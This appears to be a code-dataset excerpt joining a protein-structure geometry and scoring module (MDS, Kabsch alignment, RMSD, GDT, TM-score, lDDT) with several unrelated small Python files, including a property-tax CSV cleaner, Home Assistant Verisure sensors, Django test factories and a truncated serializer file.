ratio = weights * (pre_dist_mat / dist_mat)
B = -ratio
B[:, diag_idxs, diag_idxs] += ratio.sum(dim=-1)
# update
coords = (1. / N * torch.matmul(B, best_3d_coords))
dis = torch.norm(coords, dim=(-1, -2))
if verbose >= 2:
print('it: %d, stress %s' % (i, stress))
        # stop early if the relative improvement falls below the tolerance
if (his[-1] - stress / dis).mean() <= tol:
if verbose:
print('breaking at iteration %d with stress %s' % (i,
stress / dis))
break
best_3d_coords = coords
his.append( stress / dis )
return torch.transpose(best_3d_coords, -1,-2), torch.stack(his, dim=0)
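# usage sketch: a minimal, hedged example of `mds_torch` -- recover 3d coords
# from a synthetic, batched (B x N x N) euclidean distance matrix. The sizes
# and the seed are illustrative assumptions, not values from the source.
def _demo_mds_torch():
    torch.manual_seed(0)
    true_coords = torch.randn(2, 8, 3)                     # batch of 2 clouds of 8 points
    dist_mat = torch.cdist(true_coords, true_coords, p=2)  # (2, 8, 8), symmetric
    coords, stress_hist = mds_torch(dist_mat, iters=20, verbose=0)
    assert coords.shape == (2, 3, 8)                       # outputs are (batch x 3 x N)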
def mds_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
""" Gets distance matrix. Outputs 3d. See below for wrapper.
        Assumes (for now) distogram is (N x N) and symmetric
Out:
* best_3d_coords: (3 x N)
* historic_stress
"""
if weights is None:
weights = np.ones_like(pre_dist_mat)
# ensure batched MDS
pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
# start
batch, N, _ = pre_dist_mat.shape
his = [np.inf]
# init random coords
best_stress = np.inf * np.ones(batch)
best_3d_coords = 2*np.random.rand(batch, 3, N) - 1
# iterative updates:
for i in range(iters):
# compute distance matrix of coords and stress
dist_mat = np.linalg.norm(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :], axis=-3)
stress = (( weights * (dist_mat - pre_dist_mat) )**2).sum(axis=(-1, -2)) * 0.5
# perturb - update X using the Guttman transform - sklearn-like
dist_mat[dist_mat == 0] = 1e-7
ratio = weights * (pre_dist_mat / dist_mat)
B = -ratio
B[:, np.arange(N), np.arange(N)] += ratio.sum(axis=-1)
# update - double transpose. TODO: consider fix
coords = (1. / N * np.matmul(best_3d_coords, B))
dis = np.linalg.norm(coords, axis=(-1, -2))
if verbose >= 2:
print('it: %d, stress %s' % (i, stress))
        # stop early if the relative improvement falls below the tolerance
if (best_stress - stress / dis).mean() <= tol:
if verbose:
print('breaking at iteration %d with stress %s' % (i,
stress / dis))
break
best_3d_coords = coords
best_stress = stress / dis
his.append(best_stress)
return best_3d_coords, np.array(his)
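# usage sketch: the hedged numpy counterpart of the demo above; same toy
# setup, with sizes and seed as illustrative assumptions.
def _demo_mds_numpy():
    rng = np.random.RandomState(0)
    true_coords = rng.randn(2, 3, 8)  # (batch, 3, N)
    diff = true_coords[:, :, :, None] - true_coords[:, :, None, :]
    dist_mat = np.linalg.norm(diff, axis=1)  # (batch, N, N) pairwise distances
    coords, stress_hist = mds_numpy(dist_mat, iters=50, verbose=0)
    assert coords.shape == (2, 3, 8)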
def get_dihedral_torch(c1, c2, c3, c4):
""" Returns the dihedral angle in radians.
Will use atan2 formula from:
https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
Can't use torch.dot bc it does not broadcast
Inputs:
* c1: (batch, 3) or (3,)
        * c2: (batch, 3) or (3,)
        * c3: (batch, 3) or (3,)
        * c4: (batch, 3) or (3,)
"""
u1 = c2 - c1
u2 = c3 - c2
u3 = c4 - c3
return torch.atan2( ( (torch.norm(u2, dim=-1, keepdim=True) * u1) * torch.cross(u2,u3, dim=-1) ).sum(dim=-1) ,
( torch.cross(u1,u2, dim=-1) * torch.cross(u2, u3, dim=-1) ).sum(dim=-1) )
def get_dihedral_numpy(c1, c2, c3, c4):
""" Returns the dihedral angle in radians.
Will use atan2 formula from:
https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
Inputs:
* c1: (batch, 3) or (3,)
        * c2: (batch, 3) or (3,)
        * c3: (batch, 3) or (3,)
        * c4: (batch, 3) or (3,)
"""
u1 = c2 - c1
u2 = c3 - c2
u3 = c4 - c3
return np.arctan2( ( (np.linalg.norm(u2, axis=-1, keepdims=True) * u1) * np.cross(u2,u3, axis=-1)).sum(axis=-1),
( np.cross(u1,u2, axis=-1) * np.cross(u2, u3, axis=-1) ).sum(axis=-1) )
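# usage sketch: a hedged sanity check for the dihedral helpers -- a planar cis
# arrangement should give ~0 rad and a planar trans arrangement ~pi rad. The
# points are assumptions chosen for illustration.
def _demo_dihedral():
    c1, c2, c3 = np.array([0., 0., 0.]), np.array([1., 0., 0.]), np.array([1., 1., 0.])
    cis, trans = np.array([0., 1., 0.]), np.array([2., 1., 0.])
    assert abs(get_dihedral_numpy(c1, c2, c3, cis)) < 1e-6
    assert abs(abs(get_dihedral_numpy(c1, c2, c3, trans)) - np.pi) < 1e-6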
def calc_phis_torch(pred_coords, N_mask, CA_mask, C_mask=None,
prop=True, verbose=0):
""" Filters mirrors selecting the 1 with most N of negative phis.
Used as part of the MDScaling wrapper if arg is passed. See below.
Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
Inputs:
* pred_coords: (batch, 3, N) predicted coordinates
* N_mask: (batch, N) boolean mask for N-term positions
* CA_mask: (batch, N) boolean mask for C-alpha positions
        * C_mask: (batch, N) or None. boolean mask for C-term (carbonyl C) positions,
            or automatically calculated from N_mask and CA_mask if None.
* prop: bool. whether to return as a proportion of negative phis.
* verbose: bool. verbosity level
Output: (batch, N) containing the phi angles or (batch,) containing
the proportions.
Note: use [0] since all prots in batch have same backbone
"""
# detach gradients for angle calculation - mirror selection
pred_coords_ = torch.transpose(pred_coords.detach(), -1 , -2).cpu()
# ensure dims
N_mask = expand_dims_to( N_mask, 2-len(N_mask.shape) )
CA_mask = expand_dims_to( CA_mask, 2-len(CA_mask.shape) )
if C_mask is not None:
C_mask = expand_dims_to( C_mask, 2-len(C_mask.shape) )
else:
C_mask = torch.logical_not(torch.logical_or(N_mask,CA_mask))
# select points
n_terms = pred_coords_[:, N_mask[0].squeeze()]
c_alphas = pred_coords_[:, CA_mask[0].squeeze()]
c_terms = pred_coords_[:, C_mask[0].squeeze()]
    # compute phis for every protein in the batch
phis = [get_dihedral_torch(c_terms[i, :-1],
n_terms[i, 1:],
c_alphas[i, 1:],
c_terms[i, 1:]) for i in range(pred_coords.shape[0])]
# return percentage of lower than 0
if prop:
return torch.tensor( [(x<0).float().mean().item() for x in phis] )
return phis
def calc_phis_numpy(pred_coords, N_mask, CA_mask, C_mask=None,
prop=True, verbose=0):
""" Filters mirrors selecting the 1 with most N of negative phis.
Used as part of the MDScaling wrapper if arg is passed. See below.
Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
Inputs:
* pred_coords: (batch, 3, N) predicted coordinates
* N_mask: (N, ) boolean mask for N-term positions
* CA_mask: (N, ) boolean mask for C-alpha positions
        * C_mask: (N, ) or None. boolean mask for C-term (carbonyl C) positions,
            or automatically calculated from N_mask and CA_mask if None.
* prop: bool. whether to return as a proportion of negative phis.
* verbose: bool. verbosity level
Output: (batch, N) containing the phi angles or (batch,) containing
the proportions.
"""
# detach gradients for angle calculation - mirror selection
pred_coords_ = np.transpose(pred_coords, (0, 2, 1))
n_terms = pred_coords_[:, N_mask.squeeze()]
c_alphas = pred_coords_[:, CA_mask.squeeze()]
# select c_term auto if not passed
if C_mask is not None:
c_terms = pred_coords_[:, C_mask]
else:
c_terms = pred_coords_[:, (np.ones_like(N_mask)-N_mask-CA_mask).squeeze().astype(bool) ]
    # compute phis for every protein in the batch
phis = [get_dihedral_numpy(c_terms[i, :-1],
n_terms[i, 1:],
c_alphas[i, 1:],
c_terms[i, 1:]) for i in range(pred_coords.shape[0])]
# return percentage of lower than 0
if prop:
return np.array( [(x<0).mean() for x in phis] )
return phis
# alignment by centering + rotation to compute optimal RMSD
# adapted from : https://github.com/charnley/rmsd/
def kabsch_torch(X, Y, cpu=True):
""" Kabsch alignment of X into Y.
Assumes X,Y are both (Dims x N_points). See below for wrapper.
"""
device = X.device
# center X and Y to the origin
X_ = X - X.mean(dim=-1, keepdim=True)
Y_ = Y - Y.mean(dim=-1, keepdim=True)
    # calculate the covariance matrix
C = torch.matmul(X_, Y_.t()).detach()
if cpu:
C = C.cpu()
# Optimal rotation matrix via SVD
if int(torch.__version__.split(".")[1]) < 8:
# warning! int torch 1.<8 : W must be transposed
V, S, W = torch.svd(C)
W = W.t()
else:
V, S, W = torch.linalg.svd(C)
# determinant sign for direction correction
d = (torch.det(V) * torch.det(W)) < 0.0
if d:
S[-1] = S[-1] * (-1)
V[:, -1] = V[:, -1] * (-1)
# Create Rotation matrix U
U = torch.matmul(V, W).to(device)
# calculate rotations
X_ = torch.matmul(X_.t(), U).t()
# return centered and aligned
return X_, Y_
def kabsch_numpy(X, Y):
""" Kabsch alignment of X into Y.
Assumes X,Y are both (Dims x N_points). See below for wrapper.
"""
# center X and Y to the origin
X_ = X - X.mean(axis=-1, keepdims=True)
Y_ = Y - Y.mean(axis=-1, keepdims=True)
    # calculate the covariance matrix
C = np.dot(X_, Y_.transpose())
# Optimal rotation matrix via SVD
V, S, W = np.linalg.svd(C)
# determinant sign for direction correction
d = (np.linalg.det(V) * np.linalg.det(W)) < 0.0
if d:
S[-1] = S[-1] * (-1)
V[:, -1] = V[:, -1] * (-1)
# Create Rotation matrix U
U = np.dot(V, W)
# calculate rotations
X_ = np.dot(X_.T, U).T
# return centered and aligned
return X_, Y_
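# usage sketch: a hedged check of the Kabsch helpers -- applying a rigid
# transform to a cloud and re-aligning should leave a near-zero residual.
# The rotation (about the z axis) and the sizes are illustrative assumptions.
def _demo_kabsch():
    rng = np.random.RandomState(0)
    X = rng.randn(3, 10)
    theta = 0.3
    R = np.array([[np.cos(theta), -np.sin(theta), 0.],
                  [np.sin(theta),  np.cos(theta), 0.],
                  [0., 0., 1.]])
    Y = R @ X + np.array([[1.], [2.], [3.]])  # rotated + translated copy of X
    X_, Y_ = kabsch_numpy(X, Y)
    assert np.abs(X_ - Y_).max() < 1e-8       # aligned clouds coincide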
# metrics - more formulas here: http://predictioncenter.org/casp12/doc/help.html
def distmat_loss_torch(X=None, Y=None, X_mat=None, Y_mat=None, p=2, q=2, custom=None, distmat_mask=None):
""" Calculates a loss on the distance matrix - no need to align structs.
Inputs:
            * X: (N, d) tensor. the predicted structure. One of (X, X_mat) is needed.
            * X_mat: (N, N) tensor. the predicted distance matrix. Optional.
            * Y: (N, d) tensor. the true structure. One of (Y, Y_mat) is needed.
            * Y_mat: (N, N) tensor. the true distance matrix. Optional.
* p: int. power for the distance calculation (2 for euclidean)
* q: float. power for the scaling of the loss (2 for MSE, 1 for MAE, etc)
* custom: func or None. custom loss over distance matrices.
ex: lambda x,y: 1 - 1/ (1 + ((x-y))**2) (1 is very bad. 0 is good)
* distmat_mask: (N, N) mask (boolean or weights for each ij pos). optional.
"""
assert (X is not None or X_mat is not None) and \
(Y is not None or Y_mat is not None), "The true and predicted coords or dist mats must be provided"
# calculate distance matrices
if X_mat is None:
X_mat = torch.cdist(X, X, p=p)
if Y_mat is None:
Y_mat = torch.cdist(Y, Y, p=p)
if distmat_mask is None:
distmat_mask = torch.ones_like(Y_mat).bool()
# do custom expression if passed
if custom is not None:
loss = custom(X_mat, Y_mat).mean()
    else:
        # **2 ensures the loss is always positive; it is rescaled to the desired power below
        loss = ( X_mat - Y_mat )**2
if q != 2:
loss = loss**(q/2)
return loss[distmat_mask].mean()
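# usage sketch: a hedged example of `distmat_loss_torch` -- a structure against
# itself gives 0, a noisy copy gives a positive loss. Sizes/seed are assumptions.
def _demo_distmat_loss():
    torch.manual_seed(0)
    X = torch.randn(16, 3)
    assert distmat_loss_torch(X=X, Y=X).item() == 0.
    noisy = X + 0.1 * torch.randn_like(X)
    assert distmat_loss_torch(X=X, Y=noisy, q=1).item() > 0.  # q=1 gives an MAE-style loss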
def rmsd_torch(X, Y):
""" Assumes x,y are both (B x D x N). See below for wrapper. """
return torch.sqrt( torch.mean((X - Y)**2, axis=(-1, -2)) )
def rmsd_numpy(X, Y):
""" Assumes x,y are both (B x D x N). See below for wrapper. """
return np.sqrt( np.mean((X - Y)**2, axis=(-1, -2)) )
def gdt_torch(X, Y, cutoffs, weights=None):
""" Assumes x,y are both (B x D x N). see below for wrapper.
* cutoffs is a list of `K` thresholds
* weights is a list of `K` weights (1 x each threshold)
"""
device = X.device
if weights is None:
weights = torch.ones(1,len(cutoffs))
else:
weights = torch.tensor([weights]).to(device)
# set zeros and fill with values
GDT = torch.zeros(X.shape[0], len(cutoffs), device=device)
dist = ((X - Y)**2).sum(dim=1).sqrt()
# iterate over thresholds
for i,cutoff in enumerate(cutoffs):
GDT[:, i] = (dist <= cutoff).float().mean(dim=-1)
# weighted mean
return (GDT*weights).mean(-1)
def gdt_numpy(X, Y, cutoffs, weights=None):
""" Assumes x,y are both (B x D x N). see below for wrapper.
* cutoffs is a list of `K` thresholds
* weights is a list of `K` weights (1 x each threshold)
"""
if weights is None:
weights = np.ones( (1,len(cutoffs)) )
else:
weights = np.array([weights])
# set zeros and fill with values
GDT = np.zeros( (X.shape[0], len(cutoffs)) )
dist = np.sqrt( ((X - Y)**2).sum(axis=1) )
# iterate over thresholds
for i,cutoff in enumerate(cutoffs):
GDT[:, i] = (dist <= cutoff).mean(axis=-1)
# weighted mean
return (GDT*weights).mean(-1)
def tmscore_torch(X, Y):
""" Assumes x,y are both (B x D x N). see below for wrapper. """
L = X.shape[-1]
d0 = 1.24 * np.cbrt(L - 15) - 1.8
# get distance
dist = ((X - Y)**2).sum(dim=1).sqrt()
# formula (see wrapper for source):
return (1 / (1 + (dist/d0)**2)).mean(dim=-1)
def tmscore_numpy(X, Y):
""" Assumes x,y are both (B x D x N). see below for wrapper. """
L = X.shape[-1]
d0 = 1.24 * np.cbrt(L - 15) - 1.8
# get distance
dist = np.sqrt( ((X - Y)**2).sum(axis=1) )
# formula (see wrapper for source):
return (1 / (1 + (dist/d0)**2)).mean(axis=-1)
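# usage sketch: a hedged sanity check of the metric kernels -- for identical
# structures both GDT (any cutoff set) and the raw tmscore kernel return 1.
# The shapes are illustrative assumptions.
def _demo_metrics():
    X = torch.randn(1, 3, 20)
    assert torch.allclose(gdt_torch(X, X, cutoffs=[1, 2, 4, 8]), torch.ones(1))
    assert torch.allclose(tmscore_torch(X, X), torch.ones(1))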
def mdscaling_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5,
fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None,
eigen=False, verbose=2):
""" Handles the specifics of MDS for proteins (mirrors, ...) """
# batched mds for full parallel
preds, stresses = mds_torch(pre_dist_mat, weights=weights,iters=iters,
tol=tol, eigen=eigen, verbose=verbose)
if not fix_mirror:
return preds, stresses
    # no need to calculate multiple mirrors - just correct the Z axis
phi_ratios = calc_phis_torch(preds, N_mask, CA_mask, C_mask, prop=True)
to_correct = torch.nonzero( (phi_ratios < 0.5)).view(-1)
# fix mirrors by (-1)*Z if more (+) than (-) phi angles
preds[to_correct, -1] = (-1)*preds[to_correct, -1]
if verbose == 2:
print("Corrected mirror idxs:", to_correct)
return preds, stresses
def mdscaling_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5,
fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None, verbose=2):
""" Handles the specifics of MDS for proteins (mirrors, ...) """
# batched mds for full parallel
preds, stresses = mds_numpy(pre_dist_mat, weights=weights,iters=iters,
tol=tol, verbose=verbose)
if not fix_mirror:
return preds, stresses
    # no need to calculate multiple mirrors - just correct the Z axis
phi_ratios = calc_phis_numpy(preds, N_mask, CA_mask, C_mask, prop=True)
for i,pred in enumerate(preds):
# fix mirrors by (-1)*Z if more (+) than (-) phi angles
        if phi_ratios[i] < 0.5:
preds[i, -1] = (-1)*preds[i, -1]
if verbose == 2:
print("Corrected mirror in struct no.", i)
return preds, stresses
def lddt_ca_torch(true_coords, pred_coords, cloud_mask, r_0=15.):
""" Computes the lddt score for each C_alpha.
https://academic.oup.com/bioinformatics/article/29/21/2722/195896
Inputs:
* true_coords: (b, l, c, d) in sidechainnet format.
* pred_coords: (b, l, c, d) in sidechainnet format.
* cloud_mask : (b, l, c) adapted for scn format.
* r_0: float. maximum inclusion radius in reference struct.
Outputs:
* (b, l) lddt for c_alpha scores (ranging between 0 and 1)
See wrapper below.
"""
device, dtype = true_coords.device, true_coords.type()
thresholds = torch.tensor([0.5, 1, 2, 4], device=device).type(dtype)
# adapt masks
cloud_mask = cloud_mask.bool().cpu()
c_alpha_mask = torch.zeros(cloud_mask.shape[1:], device=device).bool() # doesn't have batch dim
c_alpha_mask[..., 1] = True
# container for c_alpha scores (between 0,1)
wrapper = torch.zeros(true_coords.shape[:2], device=device).type(dtype)
for bi, seq in enumerate(true_coords):
# select atoms for study
c_alphas = cloud_mask[bi]*c_alpha_mask # only pick c_alpha positions
selected_pred = pred_coords[bi, c_alphas, :]
selected_target = true_coords[bi, c_alphas, :]
# get number under distance
dist_mat_pred = torch.cdist(selected_pred, selected_pred, p=2)
dist_mat_target = torch.cdist(selected_target, selected_target, p=2)
under_r0_target = dist_mat_target < r_0
compare_dists = torch.abs(dist_mat_pred - dist_mat_target)[under_r0_target]
# measure diff below threshold
score = torch.zeros_like(under_r0_target).float()
max_score = torch.zeros_like(under_r0_target).float()
max_score[under_r0_target] = 4.
# measure under how many thresholds
score[under_r0_target] = thresholds.shape[0] - \
torch.bucketize( compare_dists, boundaries=thresholds ).float()
# dont include diagonal
l_mask = c_alphas.float().sum(dim=-1).bool()
wrapper[bi, l_mask] = ( score.sum(dim=-1) - thresholds.shape[0] ) / \
( max_score.sum(dim=-1) - thresholds.shape[0] )
return wrapper
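# usage sketch: a hedged example of `lddt_ca_torch` on toy sidechainnet-shaped
# tensors (batch, length, atoms, 3); a perfect prediction scores 1 for every
# residue. All sizes here are illustrative assumptions.
def _demo_lddt():
    torch.manual_seed(0)
    coords = torch.randn(1, 5, 14, 3)         # 5 residues, 14 atom slots each
    cloud_mask = torch.ones(1, 5, 14).bool()  # every atom present
    scores = lddt_ca_torch(coords, coords, cloud_mask)
    assert torch.allclose(scores, torch.ones(1, 5))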
################
### WRAPPERS ###
################
@set_backend_kwarg
@invoke_torch_or_numpy(mdscaling_torch, mdscaling_numpy)
def MDScaling(pre_dist_mat, **kwargs):
""" Gets distance matrix (-ces). Outputs 3d.
        Assumes (for now) the distogram is (N x N) and symmetric.
        For support of distograms: see `center_distogram_torch()`
Inputs:
* pre_dist_mat: (1, N, N) distance matrix.
* weights: optional. (N x N) pairwise relative weights .
* iters: number of iterations to run the algorithm on
* tol: relative tolerance at which to stop the algorithm if no better
improvement is achieved
* backend: one of ["numpy", "torch", "auto"] for backend choice
        * fix_mirror: bool. whether to correct mirror images by flipping the
            Z axis when the majority of phi angles come out positive.
        * N_mask: indexing array/tensor for indices of backbone N.
            Only used if fix_mirror is True.
        * CA_mask: indexing array/tensor for indices of backbone C_alpha.
            Only used if fix_mirror is True.
* verbose: whether to print logs
Outputs:
* best_3d_coords: (3 x N)
* historic_stress: (timesteps, )
"""
pre_dist_mat = expand_dims_to(pre_dist_mat, 3 - len(pre_dist_mat.shape))
return pre_dist_mat, kwargs
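# usage sketch: a hedged call of the `MDScaling` wrapper, assuming the
# decorators route the `backend` kwarg as documented above. Mirror fixing is
# disabled so no backbone masks are needed; sizes/seed are assumptions.
def _demo_mdscaling():
    torch.manual_seed(0)
    pts = torch.randn(10, 3)
    dist_mat = torch.cdist(pts, pts, p=2)  # (N, N), symmetric
    coords, stress_hist = MDScaling(dist_mat, iters=20, fix_mirror=False,
                                    backend="torch", verbose=0)
    assert coords.shape[-1] == 10          # (..., 3, N)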
@expand_arg_dims(dim_len = 2)
@set_backend_kwarg
@invoke_torch_or_numpy(kabsch_torch, kabsch_numpy)
def Kabsch(A, B):
""" Returns Kabsch-rotated matrices resulting
from aligning A into B.
Adapted from: https://github.com/charnley/rmsd/
* Inputs:
* A,B are (3 x N)
* backend: one of ["numpy", "torch", "auto"] for backend choice
* Outputs: tensor/array of shape (3 x N)
"""
# run calcs - pick the 0th bc an additional dim was created
return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(rmsd_torch, rmsd_numpy)
def RMSD(A, B):
""" Returns RMSD score as defined here (lower is better):
https://en.wikipedia.org/wiki/
Root-mean-square_deviation_of_atomic_positions
* Inputs:
* A,B are (B x 3 x N) or (3 x N)
* backend: one of ["numpy", "torch", "auto"] for backend choice
* Outputs: tensor/array of size (B,)
"""
return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(gdt_torch, gdt_numpy)
def GDT(A, B, *, mode="TS", cutoffs=[1,2,4,8], weights=None):
""" Returns GDT score as defined here (highre is better):
Supports both TS and HA
http://predictioncenter.org/casp12/doc/help.html
* Inputs:
* A,B are (B x 3 x N) (np.array or torch.tensor)
* cutoffs: defines thresholds for gdt
* weights: list containing the weights
* mode: one of ["numpy", "torch", "auto"] for backend
* Outputs: tensor/array of size (B,)
"""
# define cutoffs for each type of gdt and weights
cutoffs = [0.5,1,2,4] if mode in ["HA", "ha"] else [1,2,4,8]
# calculate GDT
return A, B, cutoffs, {'weights': weights}
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(tmscore_torch, tmscore_numpy)
def TMscore(A, B):
""" Returns TMscore as defined here (higher is better):
        >0.5 (likely) >0.6 (highly likely) same fold;
        ~0.2 is the score of randomly chosen unrelated proteins.
        https://en.wikipedia.org/wiki/Template_modeling_score
Warning! It's not exactly the code in:
https://zhanglab.ccmb.med.umich.edu/TM-score/TMscore.cpp
but will suffice for now.
Inputs:
* A,B are (B x 3 x N) (np.array or torch.tensor)
* mode: one of ["numpy", "torch", "auto"] for backend
Outputs: tensor/array of size (B,)
"""
return A, B
| 41.356255
| 122
| 0.610033
| 0
| 0
| 0
| 0
| 4,773
| 0.095575
| 0
| 0
| 22,164
| 0.443813
|
4252097259c5f8f2219e8a65c81337c134ef50fa
| 1,151
|
py
|
Python
|
src/clean_property_file.py
|
wmaciel/van-crime
|
e70d0310f41de3a1b54572f6c6bf01083e56e0ab
|
[
"MIT"
] | 2
|
2016-03-03T00:14:59.000Z
|
2016-08-21T14:28:02.000Z
|
src/clean_property_file.py
|
wmaciel/van-crime
|
e70d0310f41de3a1b54572f6c6bf01083e56e0ab
|
[
"MIT"
] | null | null | null |
src/clean_property_file.py
|
wmaciel/van-crime
|
e70d0310f41de3a1b54572f6c6bf01083e56e0ab
|
[
"MIT"
] | null | null | null |
__author__ = 'walthermaciel'
import pandas as pd
import numpy as np
def load_csv(path):
# Load
    print('Loading', path)
df = pd.read_csv(path)
# Remove unwanted columns
    print('Dropping unwanted columns')
df = df[['PID', 'TAX_ASSESSMENT_YEAR', 'CURRENT_LAND_VALUE', 'STREET_NAME', 'TO_CIVIC_NUMBER']]
df.columns = ['PID', 'YEAR', 'VALUE', 'STREET_NAME', 'STREET_NUMBER']
# Remove unwanted rows
    print('Removing null rows')
df.replace('', np.nan, inplace=True)
df.dropna(inplace=True)
# Compute average value for each property
    print('Computing average value for same address properties')
g_df = df.groupby(['STREET_NAME', 'STREET_NUMBER']).mean()
df = g_df.reset_index()
return df
def main():
    for y in range(2006, 2016):
        print(y)
        path_in = '../data/property_tax_06_15/property_tax_report_csv' + str(y) + '.csv'
        df = load_csv(path_in)
        path_out = '../data/property_tax_06_15/avg_property_tax_' + str(y) + '.csv'
        print('Saving', path_out)
        df.to_csv(path_or_buf=path_out, index=False)
        print('\n')
if __name__ == '__main__':
main()
| 28.775
| 99
| 0.650738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 502
| 0.436142
|
4252c9d8b3317ae5bd56696743e5b2124dce1942
| 4,040
|
py
|
Python
|
homeassistant/components/sensor/verisure.py
|
beschouten/home-assistant
|
f50c30bbbad4d92e342c8547630c63c0c7882803
|
[
"MIT"
] | 1
|
2016-07-14T05:20:54.000Z
|
2016-07-14T05:20:54.000Z
|
homeassistant/components/sensor/verisure.py
|
beschouten/home-assistant
|
f50c30bbbad4d92e342c8547630c63c0c7882803
|
[
"MIT"
] | null | null | null |
homeassistant/components/sensor/verisure.py
|
beschouten/home-assistant
|
f50c30bbbad4d92e342c8547630c63c0c7882803
|
[
"MIT"
] | 1
|
2018-11-22T13:55:23.000Z
|
2018-11-22T13:55:23.000Z
|
"""
Interfaces with Verisure sensors.
For more details about this platform, please refer to the documentation
at https://home-assistant.io/components/verisure/
"""
import logging
from homeassistant.components.verisure import HUB as hub
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Verisure platform."""
sensors = []
if int(hub.config.get('thermometers', '1')):
hub.update_climate()
sensors.extend([
VerisureThermometer(value.id)
for value in hub.climate_status.values()
if hasattr(value, 'temperature') and value.temperature
])
if int(hub.config.get('hygrometers', '1')):
hub.update_climate()
sensors.extend([
VerisureHygrometer(value.id)
for value in hub.climate_status.values()
if hasattr(value, 'humidity') and value.humidity
])
if int(hub.config.get('mouse', '1')):
hub.update_mousedetection()
sensors.extend([
VerisureMouseDetection(value.deviceLabel)
for value in hub.mouse_status.values()
# is this if needed?
if hasattr(value, 'amountText') and value.amountText
])
add_devices(sensors)
class VerisureThermometer(Entity):
"""Representation of a Verisure thermometer."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the device."""
return '{} {}'.format(
hub.climate_status[self._id].location,
"Temperature")
@property
def state(self):
"""Return the state of the device."""
# Remove ° character
return hub.climate_status[self._id].temperature[:-1]
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity."""
return TEMP_CELSIUS
def update(self):
"""Update the sensor."""
hub.update_climate()
class VerisureHygrometer(Entity):
"""Representation of a Verisure hygrometer."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(
hub.climate_status[self._id].location,
"Humidity")
@property
def state(self):
"""Return the state of the sensor."""
# remove % character
return hub.climate_status[self._id].humidity[:-1]
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this sensor."""
return "%"
def update(self):
"""Update the sensor."""
hub.update_climate()
class VerisureMouseDetection(Entity):
"""Representation of a Verisure mouse detector."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(
hub.mouse_status[self._id].location,
"Mouse")
@property
def state(self):
"""Return the state of the sensor."""
return hub.mouse_status[self._id].count
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this sensor."""
return "Mice"
def update(self):
"""Update the sensor."""
hub.update_mousedetection()
| 26.933333
| 74
| 0.611881
| 2,617
| 0.647612
| 0
| 0
| 1,715
| 0.4244
| 0
| 0
| 1,211
| 0.299678
|
4253d0f64f25024f864712c154a198a0bd7c1158
| 1,135
|
py
|
Python
|
articles/blogs/tests/factories.py
|
MahmoudFarid/articles
|
f0238908b1430c949dace50401fb3ddf268a581b
|
[
"MIT"
] | null | null | null |
articles/blogs/tests/factories.py
|
MahmoudFarid/articles
|
f0238908b1430c949dace50401fb3ddf268a581b
|
[
"MIT"
] | null | null | null |
articles/blogs/tests/factories.py
|
MahmoudFarid/articles
|
f0238908b1430c949dace50401fb3ddf268a581b
|
[
"MIT"
] | null | null | null |
import factory
from factory.django import DjangoModelFactory as Factory
from django.contrib.auth.models import Permission
from ..models import Blog
from articles.users.tests.factories import UserFactory
class Blogfactory(Factory):
    user = factory.SubFactory(UserFactory)
title = factory.Faker('sentence', nb_words=3)
description = factory.Faker('paragraph', nb_sentences=5)
content = factory.Faker('paragraph', nb_sentences=10)
gdoc_link = 'https://docs.google.com/document/d/1NcF8_6ZMraTXp7H7DVzR6pbqzJgNIyg3gYLUUoFoYe8/edit'
    status = factory.Faker('random_element', elements=[status[0] for status in Blog.STATUS_CHOICES])
class Meta:
model = Blog
def create_user_writer_with_permission():
user = UserFactory()
write_blogs_perm = Permission.objects.filter(codename='can_write_blogs').first()
user.user_permissions.add(write_blogs_perm)
return user
def create_editor_user_with_permission():
user = UserFactory()
review_blogs_perm = Permission.objects.filter(codename='can_review_blogs').first()
user.user_permissions.add(review_blogs_perm)
return user
| 33.382353
| 102
| 0.767401
| 488
| 0.429956
| 0
| 0
| 0
| 0
| 0
| 0
| 169
| 0.148899
|
425489e4c1a682c5eeaad70ce3b5e922f8f9536b
| 8,847
|
py
|
Python
|
api_formatter/serializers.py
|
RockefellerArchiveCenter/argo
|
c02fec68dbb50382f3f0bdf11c51240ca22a181c
|
[
"MIT"
] | null | null | null |
api_formatter/serializers.py
|
RockefellerArchiveCenter/argo
|
c02fec68dbb50382f3f0bdf11c51240ca22a181c
|
[
"MIT"
] | 115
|
2019-08-19T20:19:06.000Z
|
2022-03-04T17:40:50.000Z
|
api_formatter/serializers.py
|
RockefellerArchiveCenter/argo
|
c02fec68dbb50382f3f0bdf11c51240ca22a181c
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from django.urls import reverse
from rest_framework import serializers
from .view_helpers import description_from_notes
class ExternalIdentifierSerializer(serializers.Serializer):
identifier = serializers.CharField()
source = serializers.CharField()
class DateSerializer(serializers.Serializer):
expression = serializers.CharField()
begin = serializers.DateField()
